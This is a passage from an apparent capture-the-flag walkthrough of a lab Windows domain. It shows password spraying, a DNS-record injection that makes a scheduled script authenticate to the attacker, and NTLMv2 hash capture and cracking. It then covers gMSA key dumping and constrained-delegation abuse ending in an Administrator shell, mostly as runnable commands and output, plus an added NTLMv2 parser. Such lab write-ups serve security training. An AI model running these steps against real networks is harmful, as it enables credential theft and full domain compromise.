SMB         10.10.10.248    445    DC               [-] intelligence.htb\Nicole.Brock:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         10.10.10.248    445    DC               [-] intelligence.htb\David.Mcbride:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         10.10.10.248    445    DC               [-] intelligence.htb\William.Lee:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         10.10.10.248    445    DC               [-] intelligence.htb\Stephanie.Young:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         10.10.10.248    445    DC               [-] intelligence.htb\John.Coleman:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         10.10.10.248    445    DC               [-] intelligence.htb\David.Wilson:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         10.10.10.248    445    DC               [-] intelligence.htb\Scott.Scott:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         10.10.10.248    445    DC               [-] intelligence.htb\Teresa.Williamson:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         10.10.10.248    445    DC               [-] intelligence.htb\John.Coleman:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         10.10.10.248    445    DC               [-] intelligence.htb\Veronica.Patel:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         10.10.10.248    445    DC               [-] intelligence.htb\John.Coleman:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         10.10.10.248    445    DC               [-] intelligence.htb\Samuel.Richardson:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         10.10.10.248    445    DC               [-] intelligence.htb\Ian.Duncan:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         10.10.10.248    445    DC               [-] intelligence.htb\William.Lee:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         10.10.10.248    445    DC               [-] intelligence.htb\Nicole.Brock:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         10.10.10.248    445    DC               [-] intelligence.htb\Travis.Evans:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         10.10.10.248    445    DC               [-] intelligence.htb\David.Mcbride:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         10.10.10.248    445    DC               [-] intelligence.htb\Jessica.Moody:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         10.10.10.248    445    DC               [-] intelligence.htb\Jason.Wright:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         10.10.10.248    445    DC               [-] intelligence.htb\Ian.Duncan:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         10.10.10.248    445    DC               [-] intelligence.htb\Jason.Wright:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         10.10.10.248    445    DC               [-] intelligence.htb\Richard.Williams:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         10.10.10.248    445    DC               [+] intelligence.htb\Tiffany.Molina:NewIntelligenceCorpUser9876
```

Next I checked which shares the user can access: the `Users` and `IT` shares are readable.

```
$ smbmap -u 'Tiffany.Molina' -p 'NewIntelligenceCorpUser9876' -H 10.10.10.248

    ________  ___      ___  _______   ___      ___       __         _______
   /"       )|"  \    /"  ||   _  "\ |"  \    /"  |     /""\       |   __ "\
  (:   \___/  \   \  //   |(. |_)  :) \   \  //   |    /    \      (. |__) :)
   \___  \    /\  \/.    ||:     \/   /\   \/.    |   /' /\  \     |:  ____/
    __/  \   |: \.        |(|  _  \  |: \.        |  //  __'  \    (|  /
   /" \   :) |.  \    /:  ||: |_)  :)|.  \    /:  | /   /  \   \  /|__/ \
  (_______/  |___|\__/|___|(_______/ |___|\__/|___|(___/    \___)(_______)
 -----------------------------------------------------------------------------
     SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com
                     https://github.com/ShawnDEvans/smbmap

[*] Detected 1 hosts serving SMB
[*] Established 1 SMB session(s)                                
                                                                                                    
[+] IP: 10.10.10.248:445        Name: 10.10.10.248              Status: Authenticated
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        IPC$                                                    READ ONLY       Remote IPC
        IT                                                      READ ONLY
        NETLOGON                                                READ ONLY       Logon server share 
        SYSVOL                                                  READ ONLY       Logon server share 
        Users                                                   READ ONLY
```

So I accessed the `Users` share to get the user flag.

<figure><img src="https://2790417739-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIXulVMkW3AbpCXfmoP1H%2Fuploads%2FHN21Agp6XevPqeQvTxmF%2Fimage.png?alt=media&#x26;token=16a5509c-3be7-4f25-beb0-32efae38780e" alt=""><figcaption></figcaption></figure>

## Privilege Escalation

In the `IT` share there is a file, `downdetector.ps1`.

<figure><img src="https://2790417739-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIXulVMkW3AbpCXfmoP1H%2Fuploads%2FfeiLOYqXfJWgW7dGPbM4%2Fimage.png?alt=media&#x26;token=67a7b00d-fd19-45b9-b77a-25c2a200214b" alt=""><figcaption></figcaption></figure>

Looking at the content of the file, I can see that it runs every five minutes, pulls every DNS record in the domain zone whose name matches `web*`, and requests `http://<name>` with `-UseDefaultCredentials`, so each request authenticates with the credentials of the account the task runs as.

```powershell
# Check web server status. Scheduled to run every 5min
Import-Module ActiveDirectory
foreach($record in Get-ChildItem "AD:DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb" | Where-Object Name -like "web*") {
    try {
        $request = Invoke-WebRequest -Uri "http://$($record.Name)" -UseDefaultCredentials
        if(.StatusCode -ne 200) {
            Send-MailMessage -From 'Ted Graves <Ted.Graves@intelligence.htb>' -To 'Ted Graves <Ted.Graves@intelligence.htb>' -Subject "Host: $($record.Name) is down"
        }
    } catch {}
}
```

So the next step is to add our own `web*` DNS record pointing at our machine, so that the script connects to us and authenticates.

{% embed url="<https://github.com/dirkjanm/krbrelayx>" %}

I add the record using `dnstool.py` from krbrelayx (by default any authenticated domain user can create records in an AD-integrated DNS zone, which is why Tiffany's low-privileged account is enough):

```
$ python dnstool.py -u 'intelligence\Tiffany.Molina' -p NewIntelligenceCorpUser9876 10.10.10.248 -a add -r web1 -d 10.10.14.4 -t A 
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[-] Adding new record
[+] LDAP operation completed successfully
```

With Responder listening on our machine, the scheduled script resolves `web1` to us and authenticates, and Responder captures the NTLMv2 response of `Ted.Graves`:

{% code overflow="wrap" %}

```
[HTTP] NTLMv2 Client   : 10.10.10.248
[HTTP] NTLMv2 Username : intelligence\Ted.Graves
[HTTP] NTLMv2 Hash     : Ted.Graves::intelligence:5051667202be3c...
```

{% endcode %}

The next step is to crack the hash with hashcat (mode 5600, NetNTLMv2); it recovers Ted's password, `Mr.Teddy`.

{% code overflow="wrap" %}

```
$ echo 'Ted.Graves::intelligence:5051667202be3c02:DBE9D36AB87B5F83565261F4C7564315:0101000000000000BAA7AA2CF9B0DA01B11CF5A3E8716936000000000200080057004A003400450001001E00570049004E002D005400480038003600510032004800560045005A0038000400140057004A00340045002E004C004F00430041004C0003003400570049004E002D005400480038003600510032004800560045005A0038002E0057004A00340045002E004C004F00430041004C000500140057004A00340045002E004C004F00430041004C0008003000300000000000000000000000002000005F575D3E654A9F41EA39F1BE11B2D988E1C78D5F6E16F768960BF8DE927286760A001000000000000000000000000000000000000900340048005400540050002F0077006500620031002E0069006E00740065006C006C006900670065006E00630065002E006800740062000000000000000000' > hash
                                                                                                                                                                                                                  
$ hashcat -m 5600 hash /usr/share/wordlists/rockyou.txt --force
hashcat (v6.2.6) starting
...
TED.GRAVES::intelligence:5051667202be3c02:dbe9d36ab87b5f83565261f4c7564315:...:Mr.Teddy
...
```

{% endcode %}
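As an added example (not from the original post), this Python parser splits the captured NetNTLMv2 line into its fields and decodes the AV pairs inside the client blob, following the MS-NLMP layout and assuming the hashcat `5600` line format; the hash line is the one captured above. The `MsvAvTargetName` pair records which service the client believed it was authenticating to, which is how a defender links a capture like this back to the injected `web1` record.

```python
import struct
from datetime import datetime, timedelta, timezone
from typing import Dict

# AV_PAIR ids from MS-NLMP 2.2.2.1; the ids in STRING_AV carry UTF-16LE strings.
AV_NAMES = {
    1: "MsvAvNbComputerName", 2: "MsvAvNbDomainName", 3: "MsvAvDnsComputerName",
    4: "MsvAvDnsDomainName", 5: "MsvAvDnsTreeName", 6: "MsvAvFlags",
    7: "MsvAvTimestamp", 8: "MsvAvSingleHost", 9: "MsvAvTargetName",
    10: "MsvAvChannelBindings",
}
STRING_AV = {1, 2, 3, 4, 5, 9}

# The line Responder captured in this write-up, in hashcat -m 5600 format:
# user::domain:server_challenge:NTProofStr:blob
CAPTURED = "Ted.Graves::intelligence:5051667202be3c02:DBE9D36AB87B5F83565261F4C7564315:0101000000000000BAA7AA2CF9B0DA01B11CF5A3E8716936000000000200080057004A003400450001001E00570049004E002D005400480038003600510032004800560045005A0038000400140057004A00340045002E004C004F00430041004C0003003400570049004E002D005400480038003600510032004800560045005A0038002E0057004A00340045002E004C004F00430041004C000500140057004A00340045002E004C004F00430041004C0008003000300000000000000000000000002000005F575D3E654A9F41EA39F1BE11B2D988E1C78D5F6E16F768960BF8DE927286760A001000000000000000000000000000000000000900340048005400540050002F0077006500620031002E0069006E00740065006C006C006900670065006E00630065002E006800740062000000000000000000"


def filetime_to_datetime(filetime: int) -> datetime:
    """Windows FILETIME (100 ns ticks since 1601-01-01 UTC) to a datetime."""
    return datetime(1601, 1, 1, tzinfo=timezone.utc) + timedelta(microseconds=filetime // 10)


def parse_av_pairs(data: bytes) -> Dict[str, str]:
    """Decode an AV_PAIR list; stops at MsvAvEOL and rejects malformed lengths."""
    pairs: Dict[str, str] = {}
    off = 0
    while True:
        if off + 4 > len(data):
            raise ValueError("AV_PAIR list not terminated by MsvAvEOL")
        av_id, av_len = struct.unpack_from("<HH", data, off)
        off += 4
        if av_id == 0:  # MsvAvEOL
            return pairs
        value = data[off:off + av_len]
        if len(value) != av_len:
            raise ValueError("AV_PAIR length runs past the end of the blob")
        off += av_len
        name = AV_NAMES.get(av_id, f"MsvAvUnknown{av_id}")
        pairs[name] = value.decode("utf-16-le") if av_id in STRING_AV else value.hex()


def parse_ntlmv2(line: str) -> dict:
    """Split a hashcat 5600 line and decode its NTLMv2_CLIENT_CHALLENGE blob."""
    user, _, domain, server_challenge, nt_proof, blob_hex = line.strip().split(":")
    blob = bytes.fromhex(blob_hex)
    # RespType, HiRespType, Reserved1, Reserved2, TimeStamp, ChallengeFromClient, Reserved3
    resp_type, hi_resp_type, _, _, filetime, client_challenge, _ = struct.unpack_from(
        "<BBHIQ8sI", blob, 0)
    if (resp_type, hi_resp_type) != (1, 1):
        raise ValueError("not an NTLMv2 response blob")
    return {
        "user": user,
        "domain": domain,
        "server_challenge": server_challenge.lower(),
        "nt_proof_str": nt_proof.lower(),
        "timestamp": filetime_to_datetime(filetime),
        "client_challenge": client_challenge.hex(),
        "av_pairs": parse_av_pairs(blob[28:]),  # AV pairs follow the 28-byte header
    }


if __name__ == "__main__":
    result = parse_ntlmv2(CAPTURED)
    for key, value in result.items():
        if key != "av_pairs":
            print(f"{key:17}: {value}")
    for name, value in result["av_pairs"].items():
        print(f"  {name:22}: {value}")
```

The NetBIOS and DNS names in the blob are the ones Responder advertised in its challenge, not the real domain's; only the target name comes from the client.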

### ReadGMSAPassword

Using BloodHound, I can see that `Ted.Graves` is a member of the `ITSUPPORT` group, which has `ReadGMSAPassword` over the account `SVC_INT`.

<figure><img src="https://2790417739-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIXulVMkW3AbpCXfmoP1H%2Fuploads%2Fnuec33VW3iv9fhj08cuz%2Fimage.png?alt=media&#x26;token=589bbb6e-7188-49f6-8f7d-91c96b1edb0f" alt=""><figcaption></figcaption></figure>

There is a tool, gMSADumper, that reads the managed password of a gMSA over LDAP as a principal that is allowed to retrieve it.

{% embed url="<https://github.com/micahvandeusen/gMSADumper>" %}

Running the tool with Ted's credentials dumps the NT hash and the Kerberos AES keys of the `SVC_INT` account (the output also lists who is allowed to read the password: `DC$` and `itsupport`).

```
$ python3 gMSADumper.py -u 'ted.graves' -p 'Mr.Teddy' -d 'intelligence.htb' -l 10.10.10.248
Users or groups who can read password for svc_int$:
 > DC$
 > itsupport
svc_int$:::c6c4f38fb3032ea3d1a401b5aab1fb0d
svc_int$:aes256-cts-hmac-sha1-96:d514b740f0165e845896bcd82613774c1669b4b5b9f1232c88cc2321949e6a86
svc_int$:aes128-cts-hmac-sha1-96:12c88420d8038a7d0c80f1bab7269a16
```

BloodHound also shows that `SVC_INT` has `AllowedToDelegate` to `DC.INTELLIGENCE.HTB`, i.e. constrained delegation to the DC. So we can use `impacket-getST` with the dumped hash to request a service ticket for the DC while impersonating `Administrator`. However, because of the clock skew between our machine and the DC (Kerberos rejects requests that are more than a few minutes off), we first need to set `set-ntp` to `0` so that the local date and time can be changed to match the DC.

<figure><img src="https://2790417739-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIXulVMkW3AbpCXfmoP1H%2Fuploads%2Fd9iGSwN83jElMQjMUP5L%2Fimage.png?alt=media&#x26;token=cd3c22fa-3bfe-4486-9782-c52aa290a6a9" alt=""><figcaption></figcaption></figure>

<figure><img src="https://2790417739-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIXulVMkW3AbpCXfmoP1H%2Fuploads%2FPOwUadWQbkANFjFTuvS9%2Fimage.png?alt=media&#x26;token=7710f7c1-635c-4b5c-9484-638c0e50627a" alt=""><figcaption></figcaption></figure>

After generating the ccache file and exporting it, I am able to log in using `impacket-wmiexec` and get an `Administrator` shell.

<figure><img src="https://2790417739-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIXulVMkW3AbpCXfmoP1H%2Fuploads%2FuMl8G4KyDQ6YxKAwaIQ3%2Fimage.png?alt=media&#x26;token=95ab28b0-f4d5-4857-81a4-82f0a20810db" alt=""><figcaption></figcaption></figure>

<figure><img src="https://2790417739-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIXulVMkW3AbpCXfmoP1H%2Fuploads%2Fdcun5wUJ5YRNAJ2evut0%2Fimage.png?alt=media&#x26;token=8afe2319-f692-4400-b21d-806cfde457d2" alt=""><figcaption></figcaption></figure>
